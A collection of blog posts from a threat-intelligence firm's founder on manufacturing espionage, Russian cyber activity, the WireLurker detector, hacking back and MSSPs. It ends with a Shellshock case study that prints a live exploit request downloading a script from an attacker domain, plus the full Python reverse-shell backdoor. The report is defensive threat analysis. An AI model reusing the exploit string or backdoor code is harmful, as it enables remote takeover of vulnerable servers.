Why Manufacturing?

I spent a day over the weekend with a good friend.  I told him that we'd done an incident response on

http://www.exelisinc.com/

a small manufacturing company.  He asked what they did, and I told him that they work with aluminum, and they manufacture all kinds of things, including heat sinks for various components.

Why do you ask? I asked him.

And then he explained something in a way, with a new perspective that I hadn't thought of.  My (simple) assumption was that the intellectual property was the target, but this guy, a technologist presiding over a large manufacturing company assured me that my assumption was flawed. Here it is...

So this company manufactures heat sinks. My assumption was that attackers wanted the heat sinks. NOOOO!

Think complex.  Heat sinks are manufactured to run coolant through channels that are cut into the metal. They may be really small, but at electrically significant spacing. This precision is incredibly hard to do.  Attackers don't want the fish, they want to learn how to fish! They want to learn how to do this type of precision machining so they can pump them out themselves.

The same holds true with optics --lasers, scopes, and any kind of high precision optic grinding. They want the process.

I feel like I've been whacked in the head to make the lightbulb come on!

Introducing Rod Castillo, Managing Director for OEM and Integration

It's been a heck of the week, and I'm happy as a hatter knowing we brought on a new Managing Director in the Lab this week.

Rod Castillo is handling our OEM Integration projects for Threat Recon.  We've had an enormous amount of interest in companies hitting the Threat Recon API, and with nearly a dozen integrations in the works, it seemed like the right time to bring someone in to assist.

Rod comes at this from an application security background. We worked together years ago at PwC.. my stint was much shorter than his.  Since then, he's been the CISO for Wyndham Hotels, and a consultant for Level 9, and now takes on a new role with us as Managing Director for OEM Integration, Wapack Labs.

We're bringing him up to speed, but he's a heck of a nice guy, smart as hell, and ready to jump in and assist in getting Threat Recon integrated into your environment. Check him out on Linkedin. Rod can be reached at rcastillo@wapacklab.com.

What's old is new again! Pay no attention to the Russian spyplanes!

I never did receive my Cold War medal, but heck, these days it's pretty much an afterthought for me anyway. I've got to laugh however. I'm preparing to do a talk next week in Pittsburgh. It's going to focus on the Ivanof doctrine and show up to date timing on how Putin does "new generation" warfare... and phase two of this plan calls for a deception plan --a rouse --to take the focus off of his real objective. Today, that objective is regaining control over pipelines in Eastern Ukraine.

They've been buzzing Sweden. Lost a sub on a fiber node off the coast of Stockholm, and today announced we'll start seeing Bears flying off the east coast.

NATO has upset Putin with their anti-Russian sentiment? Imagine that.

What is Movember?

I've been asked several times in the last week or so "Why are you growing that ugly beard?"

I've been asked if I was homeless, so I finally got a good haircut (manscaping?) to make sure that even with the spotty facial hair that comes from what my grandmother used to tell us was the American Indian side, I still look gooooooooooooddddddd.

So on that... what is Movember, and why is Stutzman going with the homeless look? Because it sparks conversation around men's health. And if you want to contribute money and be involved, check out the official Movember website. It's the real deal. And when you've got family members (like I do) who currently have prostrate cancer, and you think about it every day because the guy is eight months older than me, and you wonder what it must be like to be 52 years old and going through this, the idea of growing facial hair (mine really is bad) for a month to generate conversation is a small price to pay, and maybe, just maybe, it'll help someone.

So when you see me in MD/DC this week, or in Pittsburgh next --I'll be on the podium at a the NIST conference at Pitt --and chuckle at my feeble attempt to show support, know this.. it's for a really good reason... stop me and ask me about it.

Automating Victim Notifications - 1800 unique victims notified today

Wapack Labs has been running sinkholes since early April of this year. Up until recently we have been performing manual victim notifications however recent activity forced us to automate. Two recently sink-holed domains started generating a large quantity of traffic. One was from an old worm that has been around since 2010 but is apparently still
propagating.

http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm:Win32/Esfury

The second is from a malware variant detected as Troj/Neurevt-K

http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Neurevt-K/detailed-analysis.aspx

In less than a week of monitoring, a total of 19561 victims checked into our sinkhole. Amongthe total victims, there were approximately 1800 unique networks and/or ISPs. As part of the notifications, we are providing the victim data, destination domains and timestamps of activity. If you received one of these notifications and need more clarification, shoot us a note at notifications[at]wapacklabs.com.

Jeff

The sh*t heading toward the fan? North Korea and nuke weps?

It should come as no surprise that North Korea is building nuclear weapons, and, it should come as no surprise that they'd probably like to use them on American targets and local neighbors (although the fallout would probably head north with the wind... I'm not sure they're ready for mass radiation poisoning.).. so I'll assume they're being made for American targets.

Im curious... were the PLCs made by Siemens?

Wirelurker?

For all of you Mac users (like me) and IOS users (not like me, but there are a ton of you), Wirelurker is new interesting in the threat category.  Palo Alto published a great tech piece on the new malware, but didn't do a great job of telling what it does and why it's bad, so here you go...

It's bad. It's another class of malware that opens your system up for access by outsiders. For the non-geeks reading this, know this... you need to check for it, and if you've got it, get rid of it.

The Palo Alto report can be found here.

They've also published a script that can be used to check your system. It's easy to use. Copy and paste the commands into Terminal and hit enter. I've copied the Palo Alto's instructions from their GitHub below.

Usage

1. Open the Terminal application in your OS X system;
2. Execute this command to download the script:
   curl -O https://raw.githubusercontent.com/PaloAltoNetworks-BD/WireLurkerDetector/master/WireLurkerDetectorOSX.py
3. Run the script in the Terminal:
   python WireLurkerDetectorOSX.py
4. Read the output messages and detection result.

For any issue on the code and its result, please create a issue here:https://github.com/PaloAltoNetworks-BD/WireLurkerDetector/issues

This is AWESOME!! AirHopper - Hacking via FM Radio signals!

THIS IS AWESOME! Do you have any idea how many times I've fired up my shortwave radio and

listened to some far away place (from a really secure place --if course it was an approved device --I'm just sayin!) just for some entertaining white noise while I focused on something else?  And no, I don't trust internet radio to not place something on my machine --intentionally or unintentionally!

I'm a huge fan, and a long time amateur radio operator.  This really takes me back.  I remember (ahem, hypothetically of course) clipping the band pass filters on my 2 and 6 meter rigs to listen in on other frequency ranges (I won't say which ranges); screwing with a Sun Sparq 20 generating packet radio in early experiments between routers and repeaters (some even worked!), but the idea of hacking a computer via frequency modulation (FM radio signals) is AWESOME! In my minds eye I can see some ways this would be logical, but never thought I'd see the day.  Pay attention folks! The game changes yet again, and neither air gapping or disabling internet connections is going to help! Ah yes, radio frequency. Gotta love it!

Where do they come up with this stuff??

You've got to check out the video! (of course, at your own risk!)

SCHWEEEEETTT

You've heard me say it before. I'm a believer that if someone breaks into my home in the middle of the night and threatens me or my family, I should have the right to defend myself, my family, and my

property. And I'm a believer that my second amendment rights should extend to cyber space as well.  If someone breaks into my computer in the middle of the night, not only should I have the ability to defend myself, but also fight back. There will be consequences for sure, and when hitting someone bigger, faster, or smarter, I may just get my clock cleaned. And if I shoot and hit the wrong guy, well, again, consequences...

So why the heck are we sitting back taking it? Well, at least one country believes enough is enough. The Netherlands says that they will start hacking back in 2015. Good, bad, right, wrong, or indifferent as you might think, my feeling is this opens up a whole new can of worms. I think it's a game changer.

Thinking differently...

This is awesome (not really!) but it goes directly to something I heard just the other day.

When most computer guys think intelligence, they think packets, bytes, bits, etc.

When I think intelligence, I think... how do I think like the other guy? What's he going to do? How would he operate against someone? What motivates him/her?

So someone mentioned to me that when doing business in Russia, the company had to assign someone (full time) to watch for changes in laws (mostly tax laws) that happen over night, that if not caught, would cause harsh and immediate fines (yet another revenue opportunity). And I though to myself, That's pretty extreme! Would we really need to hire someone full time??

And today, this piece from the NY Times. Yes, others in the world do think differently. And where Putins friends stand to profit, laws (apparently) can change on a dime.

Have a read!

Hiring an MSSP?

I've been reading Anton's running commentary on hiring and using an MSSP, and I had to comment.

Wapack Labs does backend work for incident response teams who don't have the ability to do it themselves. Get your blood drawn? It probably goes to a lab for workup. We do the workup.

Yesterday, we (Wapack Labs) out-briefed a report on a case where a small (100 person) company had been breached... standard stuff (although not for them!). Spyware delivered Zeus, which delivered Crytpolocker, which of course, held them (the CEO) hostage until he paid a $600 bitcoin ransom, encrypting his files, and presumably more. But it's not the incident that had me scratching my head, it's that when we passed them a half dozen Command and Control IP addresses and domains, and told him to put them in his UTM (he's got a Sonicwall) and monitor for a few minutes to see who they're talking to internally, he had no idea what I was talking about. These guys simply were not prepared.. and they probably had no clue until recently that this stuff even existed.

The company has SSL VPNs, a Sonicwall UTM, and that's about it as far as we can tell. The IT staff is one guy.

The CEO thought they were safe.

So here's the deal... His company -a manufacturing company, has computers, but is primarily a machine shop. So what's he to do? In his case, more IT (Security) is an overhead cost in an already competitive, tight margin business... so what's he to do? Rent or buy?

My recommendation to him? Rent. Focus on his core business of making widgets.

He's already asked for recommendations - we work with four MSSPs --who all use the intel from either Red Sky Alliance or the lab (or both) to protect their customers. We've passed on recommending others, simply because the customer feedback we receive about them has been, well, less than stellar.

Look, for a company who prefers to focus on their core, MSSP is a wonderful thing, but its got to fit your use model, and you've got to know what you're going to get. In the mean time, the idea of installing a suite of security tools, hiring a team, and budgeting those increasingly hard to maintain margins comes at a high price for manufacturing companies like the one we visited. MSSP's, when used correctly, are a GREAT alternative.

Change in blog format

I've taken a bit of a different tact on blogging of late. Rather than point out hard issues (that sometimes get fixed, sometimes not), I've started posting through the week. Posts to the Henrybasset Blog announce in Twitter, Linkedin, and Facebook but because of both issues associated with the use of a mailer system, I'm going to temporarily hold on announcing via email. If you'd like to receive updates from my blog, please feel free to sign on, follow me on twitter at @henrybasset, Google+, or Linkedin.

I'm keeping it short this morning... daughter's testing for High School admissions (can you imagine!).

Have a great weekend. Keep an eye out through the week. I'll be posting!

jeff

Moscow, Beijing poised to sign deal on joint cyber security ops

This is interesting to me.

"A draft treaty apparently outlines mutual agreement to the use of online operations to interfere with independent states in a bid to undermine sovereignty or disrupt social, economic or political order."

The idea that Russia and China are reportedly signing an agreement on November 10th for joint us of online operations is amazing to me.  For those of you who've heard me talk,  I talk much about the idea of disintermediation... taking out the middle man.  Who, do you think independent states might be?  I'm guessing the US, maybe Sweden (just a wild guess after Russian flyovers, and a submarine off the coast of Stockholm), maybe Poland and Ukraine? Regardless,  if you think for a moment that infrastructures in China are only used by Chinese hackers today, you're wildly mistaken.  The sky isn't falling, but once these guys figure out how to working together (all new partnerships go through forming, storming, norming and performing... we'll see how long it takes)... but once they figure it out, the game changes.

Poles who spied for Russia?

We've been tracking the Russia | Ukraine conflict for about a year, and last month one of our analysts speculated that we'd see cyber activity hitting Polish targets. It should come as no surprise. Poland has been looking for opportunities to reduce their dependence on Russian gas, which btw, travels through pipelines in Ukraine... seeing any patterns?

So this crossed my radar tonight when I had a few moments to settle in for the night. Intelnews has been talking about Russian spies in Poland.  Intelnews is one of my favorite sites for non-technical, geopolitically focused intelligence... and this is the third such piece I've seen in two days. And with the thought that Russia will continue to regain control, if not over Ukraine, then over the lines that pass their fuel to the EU, and also over those who attempt to find other sources, it is our belief that Poland will not only land in the crosshairs of foreign intelligence (from Russia), but also that we'll see the Putin/Ivanov cyber playbook continue, but with expanded new targeting.

So I scratch my head. With Cyber Berkut (a Ukranian, pro-Russian hacker group) hitting the Warsaw Exchange in August, and the reporting of Russian intelligence operating in Poland... does it make sense that we see ISIS messaging in files pulled from Warsaw Exchange today? I'm not jumping to conclusions, only looking at the pile of data with one eye closed and the other in a hard squint.

If it walks like a duck, quacks like a duck, and leaves little piles around my pond... Well, we're keeping an eye out for swimmers scooting over the water.

Warsaw Stock Exchange whacked? Cyber Berkut?

Pastebin indications of the Warsaw Stock Exchange. Here's the first reporting we've seen after reporting it to our members and customers.

According to other reporting, several thousand passwords and files leaked.  Apparently, there were also attacks attributed to Cyber Berkut in August. If you were at the FS-ISAC summit, I told you the Cyber Berkut and Green Dragon.. they've also been used to attack a Ukrainian bank and governments in the EU.

iCloud... and of course, Apple's response

It doesn't call out attacks from China, but Apple does respond.. if you didn't know how to check it (I'm assuming that if you read my blog, you probably do... I hope you do...). But here's Apple's directions on how to check the digital certificate associated with the iCloud website.

http://support.apple.com/kb/HT6550?viewlocale=en_US&locale=en_US

"The iCloud website is protected with a digital certificate. If users get an invalid certificate warning in their browser while visiting www.icloud.com, they should pay attention to the warning and not proceed."

I have a couple of thoughts on this.. you knew I would.

First, the iCloud website is indeed NOT protected by a digital certificate. The digital certificate in and of itself is part of a protection scheme, but I wouldn't hang my hat on a digital certificate keeping bad guys out of iCloud.

Second, leaving this to users to check, 'pay attention to the warning and not proceed' strikes me smack in the funny bone. I want to laugh, but it hurts when I get hit there. Check that digital cert every time you log in. I wonder if my mom will check it when she logs in. Will yours?

China in iCloud? Like a freakin sticky booger!

Apple iCloud is (allegedly) fully of Chinese hackers, grabbing personal photos, personal information, and presumably, my iTunes library! I'm thinking there's a simple and easy defense. Let them find my P90X starting pictures it'll scare 'em off for good! They'll never come back!

http://thehill.com/policy/cybersecurity/221435-chinese-government-suspected-of-launching-apple-cyberattack

Regardless, these guys keep coming back. So two things.. Chinese hackers as I know them aren't as much interested in personal information -that's the domain of others, more interested in intellectual property and targeting Falun Gong. The MO (to me) sounds more like someone else using a Chinese infrastructure to pull off something more. iCloud isn't exactly known for hosting business, so I'm thinking (speculating only) that it's PII that the attackers might be after (or maybe they'll find the pictures of the iPhone 7??). To the money guys (meaning carders) full identities mean more money --PINs are more easily reset. 

So is it Chinese? Is it somoene else using Chinese tools? Tell me more!

Jeff

How do we achieve 100%?

I nearly always drive when I travel. I hate to fly. I drive because before or after a busy week, the time on the road lets me think, without the constant interruption of email, phone calls, etc. This is some of my most productive thinking time. I like to play audio books. Yesterday it was Moby Dick --I like the classics.

Yesterday, during my eight hour drive, one of the things that I thought about over and over, was a conversation I'd had with a security manager at one of the government agencies during the week. We talked about his small team, and the need for analysis, and as the conversation continued, he brought it back to the user. Here's what he said. It stuck with me...

Users get literally seconds to decide whether or not to click that email. They've gotten really good at recognizing run of the mill spam, and sometimes even catch the more advanced phishing, but still, our job is to give them the tools to help them during those few seconds. And if they make the wrong choice, then we need to be able to protect them. They really do try and do the right thing, but the emails can look very real. What are they to do? They rely on us.

So on the heels of yesterdays (blah) blog that I posted before hitting the road, I wanted to take a moment and address this very simple, but at the same time, very complex thought process.

This manager told me the story of an overzealous retired Air Force cyber guy who walked the halls, telling people, one at a time, that they needed help. He did threat briefs, helped users, and built a program --one office, one person at a time. Every office apparently has their own systems administration team, and none want to be 'that guy' who let their boss be embarrassed by having him or her click on spam. So they do an amazing amount of education and awareness. But again, it's not just the 90% that we must consider. And while it sounds unreachable, identification and mitigation of 100% of malicious emails must be the goal.

So how does that happen? Today, it doesn't. I've heard of email 'detonation' services that click on every link. DLP in this space is largely ineffective. Rule based systems have to little flexibility.

So I put this to you...

Thoughts? How do we achieve 100% guarantees of user protection in their email? How do we protect a diligent user when when they make the wrong choice?

Thoughts?
Jeff

Henrybasset weekly

I had the pleasure of attending the FS-ISAC conference this week, and to be the first speaker on the podium on Tuesday morning. The overarching theme was, as many conferences are this year, cyber threat intelligence. My talk offered a timeline analysis of the Russia | Ukraine conflict, and how the timeline tracked so nicely with the Ivanov Doctrine. Ivanov was the Russian Minister of Defense, who after receiving a paper from Putin in 2003, changed radically the direction of the Russian military. It appears they've taken many lessons from the US. In fact, two researchers detailed lessons learned from Desert Storm, Desert Fox, Yugoslavia, and Afghanistan spelled out those lessons learned quite nicely. And you know what? The playbook worked in Ukraine. And the story was well received at the ISAC, and again today to a new audience.

There were a couple of thoughts that I took away from the conference. First, one of the presenters made a comment that "you can't get all of the intelligence you need by yourself". The second, was the idea that there are now verticals forming in the threat intelligence space. I forgot who said it, but verticals appear to be forming. There were several, but these were the ones I remembered without going back and consulting my notes:

• Information Sharing
• Content (Intelligence) providers
• Threat information management companies

Interestingly enough, every time we go out and talk about Red Sky Alliance and Wapack Labs, we seem to run into the same couple of competitors, and so, the education begins. Today, the education started with full-on, make it relevant threat presentation. Strategic intelligence boiled down into the stuff that's going to hurt you today, ending with a list of compromised accounts. Normally we include a few other relevant tidbits but it's been such a busy week that I didn't have time to do the appropriate pre-work before going onsite. None-the-less, they quickly understood the difference between a company that produces intelligence (Wapack Labs), delivering it in a crowdsourced collaboration (Red Sky). The idea that data can be boiled out of good analysis, provided with the context that the ISAC members now know as Intelligence, delivered in such a way that it can be brought into a management system and managed. 

So, when someone says "you can't get everything you need by yourself", try asking someone in Red Sky. When you need information delivered that's both high confidence, human analyzed, and parsable by a management system, try a TIM. And if you don't have researchers that you feel could benefit from a crowdsourced analysis center (Red Sky); when you want a managed security service provider that uses our data, try one of the folks that use data from the portal to protect you. There are a couple of good ones I'd recommend. Call me and I'll introduce you. 

That's it for now. I'm going to keep it short. It's Friday night, and before I drive back to New England tomorrow I'm going to smoke a great cigar and have a martini.. because this was a GREAT week.

So until next time,

Have a GREAT weekend!
Jeff

Red Sky Weekly: FAQ and ShellShock

At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"

So let's start here...

Wapack Labs is an intelligence, research and analysis company. We sell information.

• Wapack Labs authors sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, Subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.

Red Sky Alliance is a crowdsourcing platform for cyber threat intelligence pro's. Discussions are deep, and at the end of the thread, they receive a finished report with analysis of the discussion.  

• Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
• For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!

As an example of one of our reports, I've posted (below) a snippet from a Wapack Labs report to Red Sky Alliance members and Wapack Labs subscribers...

We published this report in it's entirety last week.

We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)

We're looking for use cases where we might help protect against. This is one of three case studies that we'd identified, taking advantage of Shellshock. 

You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.

So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;) 

SHELLSHOCK CASE STUDY AND INFRASTRUCTURE

Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized Shellshock bash vulnerability, described in CVE -2014-6271.  The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27^th with a sharp decline as of September29^th . This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, this may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill-chain into more targeted operations.

Legacy Scamming infrastructure re-emerges with Shellshock

A recently observed instance of Shellshock in the wild took the form of a Python implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:

Originating IPs	Shellshock Request
14.163.12.119 77.29.189.34 78.15.20.81 78.161.195.166 79.136.130.110 88.253.229.151 93.139.212.67 109.227.100.189 112.156.18.40 113.171.116.163 117.218.186.16 118.172.123.111 119.130.114.154 124.123.75.68 178.120.175.81 178.121.79.68 190.49.241.220 190.82.114.190 223.206.54.26	() { :;}; /bin/bash -c '/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm

!/usr/bin/env python from socket import * import os from time import sleep import sys fpid = os.fork() if fpid!=0:     host='stats.google-traffic-analytics.com'     port=9091     sockobj = None     ############################################     sockobj = None     recv = False     def connect():         try:             sockobj=socket(AF_INET,SOCK_STREAM)             sockobj.connect((host,port))             return sockobj         except:             return False     while True:         while not sockobj:             sockobj = connect()             print "[*] Trying to reconnect..."             sleep(1)             if sockobj:                 print "[+] Connected"         recv = sockobj.recv(1024)         #print recv         if not recv: sockobj = False; break;         cmd = recv.strip()         res = os.popen(cmd).read()         if res:             sockobj.sendall(res)

Open source research on google-traffic-analytics.com only returned one previous hit from 2010. In August of 2010, Securi.net reported a wave of spam that affected more than 200K websites including many popular sites. Investigation of the activity revealed that they were all controlled by www.google-traffic-analytics.com. The blog reported that google-traffic-analytics.com leveraged the compromised sites as part of a widespread spamming infrastructure.

Legacy Whois Record	Current Record
Registrant Contact:    Goga Gastoyan    Goga Gastoyan Goga Gastoyan bash@blogbuddy.ru    +7.4957452002 fax: +7.4957452002    Pokryshkina d.36 kv.36    Moscow Moscow 119602    ru	Admin Name: Radovanka Janekovic Admin Organization: Goga Gastoyan Admin Street: Ljubljanska 6 Admin City: Bled Admin State/Province: Bled Admin Postal Code: 4260 Admin Country: SI Admin Phone: +386.15765749 Admin Phone Ext: Admin Fax: +386.15765749 Admin Fax Ext: Admin Email: support@google-traffic-analytics.com

Table 5. google-traffic-analytics.com Scanning Nodes

Upon successful exploitation, a CURL request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple yet effective Backdoor that works on both Linux and Windows. It also has a zero detection on Virus Total [1]. The configured C2 address is hosted on subdomain stats.google-traffic-analytics.com. The downloaded python script will attempt connection C2 on port 9091 and if the C2 is listening  - a shell is opened up to the victim.

During testing, a the C2 node issued a uname –a command which prints all available information about a Linux system [2]. [Comment: No additional activity was observed.] (See Mitigations section for a SNORT signature)

The re-emergence of this domain after an apparent four year hiatus begs the question of whether it belongs to the same attackers. A Whois history report from Domain Tools lists the registrant during 2010 as “Goga Gastoyan”, (bash@blogbuddy.ru), however this changed in 2013 to the current owner “Radovanka Janekovic”. Further inspection of the records revealed Goga Gastoyan as the Admin organization in the new record – thus confirming likely attribution to the same attackers.  With the connection made to the legacy infrastructure, one could assume that this latest activity involving Shellshock could be the most recent attempt to expand the spamming network.

Table 6. Whois Record Comparison

[1] https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/

[2] http://linux.about.com/library/cmd/blcmdl1_uname.htm

[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html

------------------------------------------------------

I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).

This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.

Have a great weekend!
Jeff